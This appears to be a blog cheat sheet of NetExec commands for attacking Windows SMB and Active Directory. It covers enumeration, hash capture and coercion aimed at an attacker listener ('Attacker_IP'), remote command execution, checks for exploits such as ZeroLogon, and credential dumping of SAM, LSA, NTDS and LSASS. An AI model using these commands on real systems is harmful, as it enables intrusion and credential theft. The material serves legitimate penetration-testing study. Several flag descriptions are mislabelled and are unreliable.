NetExec SMB
NetExec SMB
NetExec SMB
- SMB can refer to Server Message Block, a network protocol for file/printer sharing across Windows, macOS, Linux, etc.
- A client-server protocol for sharing files, printers, and other resources over a network.
- Allows applications to access files on remote servers as if they were local, using TCP/IP.
- Modern versions (SMB3) offer encryption, signing, and Kerberos authentication for better security
Checks
1
2
3
nxc smb $ip -u '' -p '' # Anonymous Login
nxc smb $ip -u 'Guest' -p '' # Guest Login
nxc smb $ip -u '0xmr' -p '' # It also Guest type Authentication
Authentication
1
2
3
4
5
6
7
8
9
10
11
nxc smb $IP -u '' -p <pass> -H <NTLM_HASH> --use-kcache -k --local-auth -d <domain> --kdcHost <FQDN> --pfx-cert file.pfx --cert-pem file.pem --key-pem file.key
-p # Password Auth
-H # NTLM Hash
--user-kcache # Kcache key
-k # kerberos Auth
--pfx-cert / --pfx-base64 with --pfx-pass for PFX certificates # pfx Auth
--cert-pem with --key-pem # Both key and cert Required to Auth
--aesKey <aes_key> # AES keys
-d or --kdcHost # Specify Domain Name and Fully Qualified Domain Name
Generate File
1
2
3
4
5
6
nxc smb $IP/24 -u '' -p '' --gen-relay-list sign_off.txt | --generate-hosts hosts | --generate-krb5-file krb5.conf | --generate-tgt tgt.ccache
sudo cat sign_off.txt # check signing attack possible or not !
sudo cat hosts.txt >> /etc/hosts # fix host name
sudo cp krb5.conf /etc/krb5.conf # fix kdc error
export KRB5CCNAME=tgt.ccache # Export ccahe key and authenticate it !
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nxc smb $IP --users --shares --groups --computers --sessions --rid-brute --loggedon-users --pass-pol --disks --qwinsta --tasklist --dc-list --put-file --get-file --interfaces
--users # Enumerate domain users
--shares # List all SMB shares and permissions
--share # use share ( --share <name> --dir)
--dir # Directory list in shares ( dir or dir "/path/to" )
--groups # Enumerate domain groups
--computers # List domain computers
--sessions # Show active SMB sessions/connections
--rid-brute 10000 # Brute force users via RID cycling (up to RID 10000)
--loggedon-users # Show currently logged-on users
--pass-pol # Display domain password policy
--disks # Enumerate physical and logical drives attached to the system
--qwinsta # Enumerate RDP sessions (Cross Session Attack)
--tasklist # Check Running tasks
--dc-list # list of Domains with Ip Adresses
--put-file # Send a local file to the remote target (--put-file /tmp/whoami.txt /path/where/to/upload)
--get-file # Get a remote file on the remote target (--get-file \\Windows\\Temp\\whoami.txt /path/where/to/save)
--interfaces # Enumerate network interfaces
Attacks
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
nxc smb $ip -u '' -p ''
-M slinky -o Name=0xmr SERVER=Attacker_IP SHARES=Share_Name # You have stand with responder -I tun0 -dvw
-M gpp_password # Find passwords in Group Policy Preferences
-M pre2k # Pre2K Active Directory misconfigurations (Password will same as the username itself)
-M timeroast # Request Hash of the computer Accounts via sntp Protocal without credentials Required.
--gen-relay-list # Enumerate Hosts with SMB Signing Not Required (SMB Relay)
--qwinsta # Enumerate Active Windows Sessions (Cross session Attack)
--delegate Administrator --self # object with the msDS-AllowedToActOnBehalfOfOtherIdentity attribute set to an account you control (rbcd)
-x 'whoami /all' # Executing Remote Commands
-M rdcman
-M security-questions
-M change-password -o USER=TargetUser NEWPASS= or NEWHASH= # Change password
-M spider_plus -o DOWNLOAD_FLAG=true # Download shares files
Scan for Top Vulnerabilities
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
nxc smb $ip -u '' -p ''
-M zerologon # ZeroLogon is a critical vulnerability that allows an attacker to completely take over a domain controller.
-M nopac # noPac enables domain user to domain admin privilege escalation by exploiting vulnerabilities in Active Directory's sAMAccountName spoofing and Kerberos PAC validation.
-M printnightmare # PrintNightmare allows remote code execution via the Print Spooler service.
-M smbghost # SMBGhost is a wormable vulnerability in SMBv3 compression.
-M ms17-010 # The infamous NSA exploit used in WannaCry ransomware.
-M ntlm_reflection # NTLM Reflection is a newly discovered vulnerability from 2025.
--gen-relay-list f.txt # Identifies hosts vulnerable to SMB relay attacks where signing is not enforced.
-M spooler # Spooler Service Check
-M webdav # Spooler Service Check
-M runasppl # Check for RunAsPPL (Credential Guard)
-M coerce_plus
-M coerce_plus -o LISTENER=<AttackerIP> ALWAYS=true # Checks for multiple coercion vulnerabilities including PetitPotam, DFSCoerce, PrinterBug, MSEven, and ShadowCoerce.
Credential Dumping
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
nxc smb $ip -u '' -p ''
-M winscp # Dump Registry Saved Passwords.
--laps # Enumerate Local Administrator Password Solution
--sam # Dump SAM hashes using methods from secretsdump.py
--lsa # Requires Domain Admin or Local Admin Priviledges on target Domain Controller
-M backup_operator # Dump with BackupOperator Priv
-M wifi # You need at least local admin privilege on the remote target
-M putty # PuTTY allows users to store private keys for connections
-M ntdsutil or --ntds # Required Admin Powers
-M lsassy # You need at least local admin privilege on the remote target
-M nanodump # You need at least local admin privilege on the remote target
-M mimikatz # Enumerate via mimikatz's
-M wifi # You need at least local admin privilege on the remote target
-M putty # PuTTY allows users to store private keys for connections
-M vnc # RealVNC or TightVNC allow users to store credentials for connections
-M mremoteng
-M notepad
-M notepad++
--dpapi_hash or --dpapi
--dpapi cookies or --dpapi nosystem
More Thinks Add soon !!!
This post is licensed under CC BY 4.0 by the author.
